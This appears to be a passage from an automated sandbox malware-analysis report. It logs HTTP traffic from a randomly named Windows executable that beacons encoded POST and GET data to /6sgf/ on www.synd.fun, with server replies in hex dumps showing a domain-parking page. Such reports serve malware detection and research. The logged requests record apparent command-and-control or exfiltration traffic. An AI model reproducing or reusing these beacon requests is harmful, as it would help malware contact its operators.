                                                                                                                                                                            Data Raw: 64 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 6f 1b c7 15 7e f7 af 18 b3 80 48 da dc dd 28 29 02 db 22 a9 26 71 fa 94 4b 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 5d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a0 37 14 7d 2a 20 5f d4 28 be 28 7f 61 f9 8f fa 9d 33 bb cb 21 45 ca b7 a4 28 01 89 cb b9 9c 39 73 2e df 39 67 66 eb a7 3b a1 9b 8c 87 4a f4 92 81 df ac d3 7f e1 fa 32 8e 1b 25 2f 6e c9 8e 1c 26 de 8e 2a 09 5f 06 dd 46 29 1a 95 30 46 c9 4e b3 3e 50 89 14 6e 4f 46 b1 4a 1a a5 f7 2e fd d2 3a 87 3e 6e 0d e4 40 35 4a 43 19 f5 bd a0 5b 12 6e 18 24 2a c0 a0 48 75 a3 91 15 81 e6 ec c8 1d 4f ed 0e c3 28 31 86 ee 7a 9d a4 d7 e8 a8 1d cf 55 16 ff a8 79 81 97 78 d2 b7 62 57 fa aa b1 0a 12 89 97 f8 aa b9 bb bb 6b c7 e3 a0 63 6f 8f 82 ba a3 db ea be 17 f4 45 a4 fc 46 29 4e c6 be 8a 7b 4a 81 fc 40 75 3c d9 28 49 df 2f 89 5e a4 b6 0b 26 99 29 4b 8e 92 d0 76 e3 18 a4 a7 f3 3d b0 9f 8f de 96 e0 27 0c 6c fc 5b 5f 2d 09 92 1b c4 34 90 5d e5 5c b1 78 60 b3 1e bb 91 37 4c 9a ce 99 fa e9 cd 37 2e be 76 e9 [TRUNCATED]
                                                                                                                                                                            Data Ascii: d93Z[o~H()"&qK9-E!r]Jm4bh@7}* _((a3!E(9s.9gf;J2%/n&*_F)0FN>PnOFJ.:>n@5JC[n$*HuO(1zUyxbWkcoEF)N{J@u<(I/^&)Kv='l[_-4]\x`7L7.v3]/vIeG4xv/*k{k3[[3NdD(-&S);x*NqZxEajbsmLBFQ}fT0HO2;GGi;sn[CJY)NZn@TdVA$gZ4;V&R`(}E]?Gx>Qz7+A;_Ymn$Ngm3vp`%xZT{Q_iu{f}4sV+pk7!foo/X-0NVsUgdmeVPj>\>E]GvLH8#GIq.gPUK&uUg%d,rBtO3oq^Sn`0U|iBR74,O$G1f6}t@`YpANd49^&^7hLiLCOz &GO'7Ez?C,aB)YP`+X2c`GW"#<]=[)[lSoph"sk0 [TRUNCATED]
                                                                                                                                                                            Dec 11, 2024 09:40:47.905930042 CET1236INData Raw: b6 ea 54 fd 06 90 fa d6 00 fe eb 05 2d 5f 6d 27 96 f6 65 2c 98 44 61 d0 7d b2 52 80 ba 30 77 97 82 d6 3f 61 bd 88 50 10 ef e3 f4 1e ec 8c 29 cc e0 ea bc d3 6a e1 c4 a3 b6 56 79 c1 49 3b 04 c2 0d 10 13 03 05 ba df 22 d2 dd 9f fc 01 2e f2 78 f2 45
                                                                                                                                                                            Data Ascii: T-_m'e,Da}R0w?aP)jVyI;".xE(03{5*RXLFtw9~IKp|Bnd;-He2TzYx<|"EO+9:70Z`y[(I6<6Ab#D&k@j
                                                                                                                                                                            Dec 11, 2024 09:40:47.905945063 CET1189INData Raw: 7d e9 84 6c 69 dd 4b 9d 79 cd 2b e7 d2 6e ae f0 01 aa b1 1d b5 5d 9c 22 3b 38 6f cf cf 9a 8b 3a 58 1f 3a 1f 3b 3b fe 96 44 4c c2 82 98 20 37 3a f2 7c 44 1a 66 35 a1 66 a7 e8 bc b4 36 3d 89 29 3e ab d3 ec 00 95 7b 01 8e 39 bb e3 16 9d b7 91 09 03
                                                                                                                                                                            Data Ascii: }liKy+n]";8o:X:;;DL 7:|Df5f6=)>{9G'r@)"Ct(UWv!>ml2OOyupqEk)^;%-*m]3bvNZ{f~Niu`E)G\h|0z+,:qFhx


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            10192.168.2.550035194.58.112.174804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:40:49.256979942 CET812OUTPOST /6sgf/ HTTP/1.1
                                                                                                                                                                            Host: www.synd.fun
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.synd.fun
                                                                                                                                                                            Referer: http://www.synd.fun/6sgf/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 33 67 75 70 4a 4a 6c 78 71 33 6e 69 65 4f 67 4d 6d 51 75 37 53 6b 64 38 69 77 35 36 76 49 55 4b 70 62 63 37 67 7a 75 64 75 6c 36 57 47 65 6f 48 69 47 76 37 73 56 76 56 71 36 36 33 39 59 54 6e 53 45 30 70 73 58 76 69 5a 4d 6f 66 53 30 2f 54 75 44 50 7a 61 39 48 68 71 38 47 6a 56 64 71 33 79 65 59 57 6e 5a 47 71 59 62 51 72 45 4b 6b 6b 4e 58 53 41 6d 70 43 36 48 42 6e 45 58 76 79 2f 38 4e 58 2b 34 69 6b 45 38 4f 4d 4e 56 62 6d 68 6c 52 73 50 36 48 6d 79 58 43 75 4d 4a 4e 70 6d 31 69 58 33 71 58 77 6a 2f 2f 35 30 50 51 5a 66 58 4d 57 61 4f 54 71 2f 43 57 54 4c 2b 65 45 74 39 45 31 69 64 36 56 56 4a 74 73 53 34 61 66 44 34 67 45 58 68 2b 36 34 7a 4c 32 6e
                                                                                                                                                                            Data Ascii: x6lPJLCP=3gupJJlxq3nieOgMmQu7Skd8iw56vIUKpbc7gzudul6WGeoHiGv7sVvVq6639YTnSE0psXviZMofS0/TuDPza9Hhq8GjVdq3yeYWnZGqYbQrEKkkNXSAmpC6HBnEXvy/8NX+4ikE8OMNVbmhlRsP6HmyXCuMJNpm1iX3qXwj//50PQZfXMWaOTq/CWTL+eEt9E1id6VVJtsS4afD4gEXh+64zL2n
                                                                                                                                                                            Dec 11, 2024 09:40:50.569122076 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:50 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 64 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 6f 1b c7 15 7e f7 af 18 b3 80 48 da dc dd 28 29 02 db 22 a9 26 71 fa 94 4b 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 5d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a0 37 14 7d 2a 20 5f d4 28 be 28 7f 61 f9 8f fa 9d 33 bb cb 21 45 ca b7 a4 28 01 89 cb b9 9c 39 73 2e df 39 67 66 eb a7 3b a1 9b 8c 87 4a f4 92 81 df ac d3 7f e1 fa 32 8e 1b 25 2f 6e c9 8e 1c 26 de 8e 2a 09 5f 06 dd 46 29 1a 95 30 46 c9 4e b3 3e 50 89 14 6e 4f 46 b1 4a 1a a5 f7 2e fd d2 3a 87 3e 6e 0d e4 40 35 4a 43 19 f5 bd a0 5b 12 6e 18 24 2a c0 a0 48 75 a3 91 15 81 e6 ec c8 1d 4f ed 0e c3 28 31 86 ee 7a 9d a4 d7 e8 a8 1d cf 55 16 ff a8 79 81 97 78 d2 b7 62 57 fa aa b1 0a 12 89 97 f8 aa b9 bb bb 6b c7 e3 a0 63 6f 8f 82 ba a3 db ea be 17 f4 45 a4 fc 46 29 4e c6 be 8a 7b 4a 81 fc 40 75 3c d9 28 49 df 2f 89 5e a4 b6 0b 26 99 29 4b 8e 92 d0 76 e3 18 a4 a7 f3 3d b0 9f 8f de 96 e0 27 0c 6c fc 5b 5f 2d 09 92 1b c4 34 90 5d e5 5c b1 78 60 b3 1e bb 91 37 4c 9a ce 99 fa e9 cd 37 2e be 76 e9 [TRUNCATED]
                                                                                                                                                                            Data Ascii: d93Z[o~H()"&qK9-E!r]Jm4bh@7}* _((a3!E(9s.9gf;J2%/n&*_F)0FN>PnOFJ.:>n@5JC[n$*HuO(1zUyxbWkcoEF)N{J@u<(I/^&)Kv='l[_-4]\x`7L7.v3]/vIeG4xv/*k{k3[[3NdD(-&S);x*NqZxEajbsmLBFQ}fT0HO2;GGi;sn[CJY)NZn@TdVA$gZ4;V&R`(}E]?Gx>Qz7+A;_Ymn$Ngm3vp`%xZT{Q_iu{f}4sV+pk7!foo/X-0NVsUgdmeVPj>\>E]GvLH8#GIq.gPUK&uUg%d,rBtO3oq^Sn`0U|iBR74,O$G1f6}t@`YpANd49^&^7hLiLCOz &GO'7Ez?C,aB)YP`+X2c`GW"#<]=[)[lSoph"sk0 [TRUNCATED]
                                                                                                                                                                            Dec 11, 2024 09:40:50.569137096 CET224INData Raw: b6 ea 54 fd 06 90 fa d6 00 fe eb 05 2d 5f 6d 27 96 f6 65 2c 98 44 61 d0 7d b2 52 80 ba 30 77 97 82 d6 3f 61 bd 88 50 10 ef e3 f4 1e ec 8c 29 cc e0 ea bc d3 6a e1 c4 a3 b6 56 79 c1 49 3b 04 c2 0d 10 13 03 05 ba df 22 d2 dd 9f fc 01 2e f2 78 f2 45
                                                                                                                                                                            Data Ascii: T-_m'e,Da}R0w?aP)jVyI;".xE(03{5*RXLFtw9~IKp|Bnd;-He2TzYx<|"EO+9:70Z`y[(I6<6
                                                                                                                                                                            Dec 11, 2024 09:40:50.569148064 CET1236INData Raw: d8 d1 41 fa 00 bc 1d 62 23 d8 c4 e4 b6 a0 44 26 6b 40 6a c3 8e 99 75 50 b4 a4 0d 1f e0 fb 01 ed 31 0f a3 90 c0 e4 53 96 02 fb 32 a4 94 7e 0f b1 60 ec 4f bf df 7f 61 6d d2 06 1b e3 49 bb fd f3 e4 8b 4c ad f7 58 9b d9 36 19 84 0e d2 47 c8 dd c0 f0
                                                                                                                                                                            Data Ascii: Ab#D&k@juP1S2~`OamILX6Gw]lbmfck'}R~`aglu8|a!Dc`Ym6`p10vlA|Fpp&:O_]hMnmb3qP?pNQoG[-9G+Z38O0
                                                                                                                                                                            Dec 11, 2024 09:40:50.569159985 CET965INData Raw: 7a cd f7 2b a2 2c cb a2 3a bb 1a 71 b1 1d 46 e0 97 68 78 98 ff d2 1a be ea 9a 9c ed ab a0 9b f4 d0 72 f6 ec 22 fe 69 36 33 c8 8b 6f 62 e2 96 4d d7 85 36 dd 5c 5c 79 77 bb 52 5e 2f 57 45 13 44 17 b2 4d d3 e9 33 37 1b 4c cc b7 9c 15 e5 95 f2 71 ce
                                                                                                                                                                            Data Ascii: z+,:qFhxr"i63obM6\\ywR^/WEDM37LqiP~:3Ok!eg>%46;ox$dbpN)Rziic9K+eWn5Pq|!s"`v@Zd[By[&=~JB*oG


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            11192.168.2.550041194.58.112.174804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:40:51.905644894 CET1733OUTPOST /6sgf/ HTTP/1.1
                                                                                                                                                                            Host: www.synd.fun
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.synd.fun
                                                                                                                                                                            Referer: http://www.synd.fun/6sgf/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 33 67 75 70 4a 4a 6c 78 71 33 6e 69 65 4f 67 4d 6d 51 75 37 53 6b 64 38 69 77 35 36 76 49 55 4b 70 62 63 37 67 7a 75 64 75 6c 79 57 47 74 67 48 69 6d 54 37 74 56 76 56 32 71 36 32 39 59 54 6d 53 43 63 74 73 58 72 63 5a 4f 67 66 53 54 58 54 37 48 37 7a 56 39 48 68 33 73 47 69 62 39 71 69 79 65 49 53 6e 5a 57 71 59 62 51 72 45 4e 63 6b 61 57 53 41 71 4a 43 6c 41 42 6e 59 61 50 7a 57 38 4f 6e 75 34 69 78 2f 38 2b 73 4e 55 37 32 68 6e 6a 30 50 6c 58 6d 77 48 53 75 55 4a 4e 56 48 31 6a 2f 37 71 58 30 4a 2f 2f 52 30 4e 57 77 66 46 76 79 37 61 41 47 45 4d 32 72 30 71 37 73 33 2f 33 34 58 66 74 39 48 45 2b 49 34 35 61 7a 2b 78 42 31 4d 69 5a 43 6f 69 73 54 35 7a 39 61 54 79 45 44 34 4a 34 34 78 59 55 66 4b 42 4c 38 31 4a 64 49 47 37 41 31 75 34 4c 33 58 51 64 6e 6e 75 77 49 79 35 71 34 75 6a 2f 70 65 38 4f 41 6d 6e 68 56 2b 68 56 5a 4a 77 42 7a 59 70 64 48 56 56 48 54 49 68 63 6d 57 6b 4c 32 41 4a 4f 70 46 6b 46 6e 50 41 67 66 79 38 30 68 36 38 45 44 65 61 67 44 58 6b 37 63 76 2f [TRUNCATED]
                                                                                                                                                                            Data Ascii: x6lPJLCP=3gupJJlxq3nieOgMmQu7Skd8iw56vIUKpbc7gzudulyWGtgHimT7tVvV2q629YTmSCctsXrcZOgfSTXT7H7zV9Hh3sGib9qiyeISnZWqYbQrENckaWSAqJClABnYaPzW8Onu4ix/8+sNU72hnj0PlXmwHSuUJNVH1j/7qX0J//R0NWwfFvy7aAGEM2r0q7s3/34Xft9HE+I45az+xB1MiZCoisT5z9aTyED4J44xYUfKBL81JdIG7A1u4L3XQdnnuwIy5q4uj/pe8OAmnhV+hVZJwBzYpdHVVHTIhcmWkL2AJOpFkFnPAgfy80h68EDeagDXk7cv/n/XKEFI1tnSIj1kzmju9qxhj4BRUVz0N05kZk50bn3s2gGJMoTcVTB2ZrEXbiQzUussJA7QfZxjxdnjxRz92hTlj8YZODDdfEueezJ23uhZMz1FoPpm8GwxeYCqrxYH4+6cMFGhNMkObSL6dZEuGlRAZhk6VG8Yl9WhcjlebnnGSTX6V5lH2UuabaT/sSomAzoubkZd4FpJv9MHcEPcTew3nLYs858UktVzGOcDBxM1vWHafT81ecwwnnvC9/Oc0PDy/zXxAwY3WEbmdTRcIJ0wnAgX7265nNp4K5+aLCPpNXQXNexkM0cUBd1NFwltx+DhOI6VXMlLojqmFNUEY5gjd7ByLr3kHbXwBNcDk5aqlZVKau6ZhEj76/EsZgSG2+HqFm2bmhl45eH5+D39qF9EDjwSQpkBmBsJoqBIlPHKLIe7btrqD0tg4g3I4dGZJMKyeuMYoU3+GyD/YpCa4AlYHfJ+9sIkp8x5RSWTjkLyYFSgZR+n0ahqIeTG5esDO7AMi15iATYTSoV2hpElxzP7ko8+s1SQcs7tlHX7jE322NQ/tKN97FK8YyubPcSKsXi5srbDqA8lzBEALySC2IwPO98ZUNLqD8RtVZL7/MXvbyIrssWl5gMgr+6TsFuSaQejRxK1ZvpN+9fb2chuNkOi4zcLCta8I0C [TRUNCATED]
                                                                                                                                                                            Dec 11, 2024 09:40:53.220352888 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:52 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 64 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 6f 1b c7 15 7e f7 af 18 b3 80 48 da dc dd 28 29 02 db 22 a9 26 71 fa 94 4b 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 5d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a0 37 14 7d 2a 20 5f d4 28 be 28 7f 61 f9 8f fa 9d 33 bb cb 21 45 ca b7 a4 28 01 89 cb b9 9c 39 73 2e df 39 67 66 eb a7 3b a1 9b 8c 87 4a f4 92 81 df ac d3 7f e1 fa 32 8e 1b 25 2f 6e c9 8e 1c 26 de 8e 2a 09 5f 06 dd 46 29 1a 95 30 46 c9 4e b3 3e 50 89 14 6e 4f 46 b1 4a 1a a5 f7 2e fd d2 3a 87 3e 6e 0d e4 40 35 4a 43 19 f5 bd a0 5b 12 6e 18 24 2a c0 a0 48 75 a3 91 15 81 e6 ec c8 1d 4f ed 0e c3 28 31 86 ee 7a 9d a4 d7 e8 a8 1d cf 55 16 ff a8 79 81 97 78 d2 b7 62 57 fa aa b1 0a 12 89 97 f8 aa b9 bb bb 6b c7 e3 a0 63 6f 8f 82 ba a3 db ea be 17 f4 45 a4 fc 46 29 4e c6 be 8a 7b 4a 81 fc 40 75 3c d9 28 49 df 2f 89 5e a4 b6 0b 26 99 29 4b 8e 92 d0 76 e3 18 a4 a7 f3 3d b0 9f 8f de 96 e0 27 0c 6c fc 5b 5f 2d 09 92 1b c4 34 90 5d e5 5c b1 78 60 b3 1e bb 91 37 4c 9a ce 99 fa e9 cd 37 2e be 76 e9 [TRUNCATED]
                                                                                                                                                                            Data Ascii: d93Z[o~H()"&qK9-E!r]Jm4bh@7}* _((a3!E(9s.9gf;J2%/n&*_F)0FN>PnOFJ.:>n@5JC[n$*HuO(1zUyxbWkcoEF)N{J@u<(I/^&)Kv='l[_-4]\x`7L7.v3]/vIeG4xv/*k{k3[[3NdD(-&S);x*NqZxEajbsmLBFQ}fT0HO2;GGi;sn[CJY)NZn@TdVA$gZ4;V&R`(}E]?Gx>Qz7+A;_Ymn$Ngm3vp`%xZT{Q_iu{f}4sV+pk7!foo/X-0NVsUgdmeVPj>\>E]GvLH8#GIq.gPUK&uUg%d,rBtO3oq^Sn`0U|iBR74,O$G1f6}t@`YpANd49^&^7hLiLCOz &GO'7Ez?C,aB)YP`+X2c`GW"#<]=[)[lSoph"sk0 [TRUNCATED]
                                                                                                                                                                            Dec 11, 2024 09:40:53.220398903 CET1236INData Raw: b6 ea 54 fd 06 90 fa d6 00 fe eb 05 2d 5f 6d 27 96 f6 65 2c 98 44 61 d0 7d b2 52 80 ba 30 77 97 82 d6 3f 61 bd 88 50 10 ef e3 f4 1e ec 8c 29 cc e0 ea bc d3 6a e1 c4 a3 b6 56 79 c1 49 3b 04 c2 0d 10 13 03 05 ba df 22 d2 dd 9f fc 01 2e f2 78 f2 45
                                                                                                                                                                            Data Ascii: T-_m'e,Da}R0w?aP)jVyI;".xE(03{5*RXLFtw9~IKp|Bnd;-He2TzYx<|"EO+9:70Z`y[(I6<6Ab#D&k@j
                                                                                                                                                                            Dec 11, 2024 09:40:53.220412016 CET1189INData Raw: 7d e9 84 6c 69 dd 4b 9d 79 cd 2b e7 d2 6e ae f0 01 aa b1 1d b5 5d 9c 22 3b 38 6f cf cf 9a 8b 3a 58 1f 3a 1f 3b 3b fe 96 44 4c c2 82 98 20 37 3a f2 7c 44 1a 66 35 a1 66 a7 e8 bc b4 36 3d 89 29 3e ab d3 ec 00 95 7b 01 8e 39 bb e3 16 9d b7 91 09 03
                                                                                                                                                                            Data Ascii: }liKy+n]";8o:X:;;DL 7:|Df5f6=)>{9G'r@)"Ct(UWv!>ml2OOyupqEk)^;%-*m]3bvNZ{f~Niu`E)G\h|0z+,:qFhx


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            12192.168.2.550047194.58.112.174804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:40:54.553649902 CET544OUTGET /6sgf/?rJl09=1ZZ8JloHsT&x6lPJLCP=6iGJK9crk1nRcZ4JnjW5XFV8mHNB14071bVcqkX9tU6kQKoAsGb7iBX66eKgx6XFHSItuyLYYeRhUgDlnjjXc53AprHIV9+v08MymvOxMZcaRpk3N2TApqLdZWOdbNTanQ== HTTP/1.1
                                                                                                                                                                            Host: www.synd.fun
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Dec 11, 2024 09:40:55.871958017 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:55 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Raw: 32 36 35 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 79 6e 64 2e 66 75 6e 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 [TRUNCATED]
                                                                                                                                                                            Data Ascii: 2652<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.synd.fun</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" rel= [TRUNCATED]
                                                                                                                                                                            Dec 11, 2024 09:40:55.872020960 CET1236INData Raw: 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74
                                                                                                                                                                            Data Ascii: lass="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.synd.fun</h1><p class="b-parking__header-description
                                                                                                                                                                            Dec 11, 2024 09:40:55.872034073 CET1236INData Raw: 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f
                                                                                                                                                                            Data Ascii: /h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"></span><div class="l-
                                                                                                                                                                            Dec 11, 2024 09:40:55.872271061 CET1236INData Raw: 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 70 72 69 6d 61 72 79 20 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 5f 77 69 64 65 20 62 2d
                                                                                                                                                                            Data Ascii: __button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.synd.fun&
                                                                                                                                                                            Dec 11, 2024 09:40:55.872328997 CET1236INData Raw: 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 20
                                                                                                                                                                            Data Ascii: _source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_sitebuilder"><strong class="b-title b-title_size_large-compact"> </strong><p class="b-text b-parking
                                                                                                                                                                            Dec 11, 2024 09:40:55.872345924 CET1236INData Raw: 75 74 6f 22 3e d0 9f d0 be d0 bb d1 83 d1 87 d0 b8 d1 82 d1 8c 20 53 53 4c 3c 2f 61 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 6c 2d 6d 61 72 67 69
                                                                                                                                                                            Data Ascii: uto"> SSL</a><p class="b-text b-parking__promo-description l-margin_top-small l-margin_bottom-normal l-margin_top-medium@desktop l-margin_bottom-none@desktop"> SSL-
                                                                                                                                                                            Dec 11, 2024 09:40:55.872358084 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 64 61 74 61 2e 72 65 66 5f 69 64 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6c 69 6e 6b 73 20 3d 20 64 6f 63 75 6d
                                                                                                                                                                            Data Ascii: } if ( data.ref_id ) { var links = document.querySelectorAll( 'a' ); for ( var i = 0; i < links.length; i++) { if ( links[ i ].href.indexOf('?') >= 0 ) {
                                                                                                                                                                            Dec 11, 2024 09:40:55.872597933 CET1236INData Raw: 6f 64 65 20 3d 20 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 20 64 6f 6d 61 69 6e 4e 61 6d 65 20 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 74 69 74
                                                                                                                                                                            Data Ascii: ode = punycode.ToUnicode( domainName ); document.title = document.title.replace( domainName, domainNameUnicode ); } for ( var i = 0; i < spans.length; i++) { if ( spans[ i ].className.match( /^puny/ )
